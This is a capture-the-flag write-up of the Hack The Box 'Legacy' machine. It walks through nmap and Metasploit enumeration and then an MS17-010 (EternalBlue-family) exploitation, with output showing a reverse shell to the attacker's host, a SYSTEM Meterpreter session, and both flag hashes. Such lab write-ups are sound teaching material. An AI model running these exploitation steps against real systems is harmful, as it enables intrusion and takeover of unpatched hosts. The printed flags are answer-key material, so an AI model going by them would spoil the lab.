Hackthebox - Legacy

This writeup is for the machine from Hackthebox – Legacy. Let’s see how we can get into the machine.

Machine Name : Legacy
IP address: 10.10.10.4
OS :Windows

First we will start with the enumeration using nmap tool. The command which I have used is intense scan with all TCP ports.

nmap -p 1-65535 -T4 -A -v 10.10.10.4

Then we found two open ports.

PORT     STATE  SERVICE       VERSION 139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn 445/tcp  open   microsoft-ds  Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Device type: general purpose|specialized Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)

Now we know the machine is running with older version of windows with SMB services. In this stage we know most of the SMB vulnerabilities will work with this machine. Then I decided to know what are all the vulnerabilities will work for the machine. So I tried to run Nmap scritps to check the vulnerabilities. Unfortunately the scripts in the current Nmap version doesn’t have a single script to check these vulnerabilities. So I decided to google it, then I found this repository in Github which contails lot of scripts for nmap this repository can be found here.

So I decide to run the script “smb-check-vulns.nse”. I have downloaded this script and added to my Nmap scripts directory. I run this script by the nmap command:

nmap --script smb-check-vulns --script-args unsafe=1 10.10.10.4

I got this result from Nmap.

Host script results: | smb-check-vulns: |   MS08-067: VULNERABLE |   Conficker: Likely CLEAN |   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE |   MS06-025: NO SERVICE (the Ras RPC service is inactive) |_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

From this result we came to know the target is vulnerable for MS08-067 vulnerability. But I decide to not run this vulnerability and go for some other vulnerability because it is a very easy and common.

SMB service have lot of vulnerabilities For example the most popular ransomeware like Wannacry and Petya have used the Eternalblue vulnerability which is present in the SMB services.

Lets dig more into the target, I decide to run auxiliary SMB version scanner in metasploit. I got this result:

msf5 auxiliary(scanner/smb/smb_version) > run [+] 10.10.10.4:445        - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional) [*] 10.10.10.4:445        - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

Now we got a solid conformation that target is running with Windows XP SP3. Then I googled the exploit for Eternalblue, and found the vulnerability MS17-010. I checked this vulnerability in metasploit and found this:

msf5 auxiliary(scanner/smb/smb_ms17_010) > search ms17_010 Matching Modules ================    #  Name                                           Disclosure Date  Rank     Check  Description    -  ----                                           ---------------  ----     -----  -----------    0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution    1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection    2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption    3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+    4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Now we got some list of vulnerabilities related to MS07-010. I decide to check with the auxiliary module before exploiting the vulnerability.

msf5 auxiliary(scanner/smb/smb_ms17_010) > run [+] 10.10.10.4:445        - Host is likely VULNERABLE to MS17-010! - Windows 5.1 [*] 10.10.10.4:445        - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

We are good to go with MS07-010, I have choosed this exploit “exploit/windows/smb/ms17_010_psexec” because this is the only vulnerability which gives access to the target machine which is Remote code execution.

msf5 exploit(windows/smb/ms17_010_psexec) > exploit [*] Started reverse TCP handler on 10.10.14.23:4444 [*] 10.10.10.4:445 - Target OS: Windows 5.1 [*] 10.10.10.4:445 - Filling barrel with fish... done [*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ----------------> [*] 10.10.10.4:445 -     [*] Preparing dynamite... [*] 10.10.10.4:445 -         [*] Trying stick 1 (x86)...Boom! [*] 10.10.10.4:445 -     [+] Successfully Leaked Transaction! [*] 10.10.10.4:445 -     [+] Successfully caught Fish-in-a-barrel [*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ----------------> [*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x81b5ada8 [*] 10.10.10.4:445 - Built a write-what-where primitive... [+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained! [*] 10.10.10.4:445 - Selecting native target [*] 10.10.10.4:445 - Uploading payload... zgSQbpWz.exe [*] 10.10.10.4:445 - Created \zgSQbpWz.exe... [+] 10.10.10.4:445 - Service started successfully... [*] Sending stage (180291 bytes) to 10.10.10.4 [*] 10.10.10.4:445 - Deleting \zgSQbpWz.exe... [*] Meterpreter session 2 opened (10.10.14.23:4444 -> 10.10.10.4:1031) at 2019-10-25 12:47:00 -0400  meterpreter > sysinfo Computer        : LEGACY OS              : Windows XP (5.1 Build 2600, Service Pack 3). Architecture    : x86 System Language : en_US Domain          : HTB Logged On Users : 1 Meterpreter     : x86/windows

Now we got Admin level access to the target machine, let’s get the flags.

meterpreter > ls Listing: C:\Documents and Settings\john\Desktop =============================================== Mode              Size  Type  Last modified              Name ----              ----  ----  -------------              ---- 100444/r--r--r--  32    fil   2017-03-16 02:19:32 -0400  user.txt meterpreter > cat user.txt e69af0e4f443de7e36876fda4ec7644f   meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode              Size  Type  Last modified              Name ----              ----  ----  -------------              ---- 100444/r--r--r--  32    fil   2017-03-16 02:18:19 -0400  root.txt meterpreter > cat root.txt 993442d258b0e0ec917cae9e695d5713

We got both the flags easily. Peice of cake.

After some time I found this vulnerability “exploit/windows/smb/doublepulsar_rce” which is DOUBLEPULSAR Payload Execution and Neutralization exploit for SMB. I think this will also work with the our target. If you guys want, try this one also.

Happy Ethical Hacking 🙂

Hackthebox - Legacy

Written by:

Kirubakaran Jayakumar

Member discussion: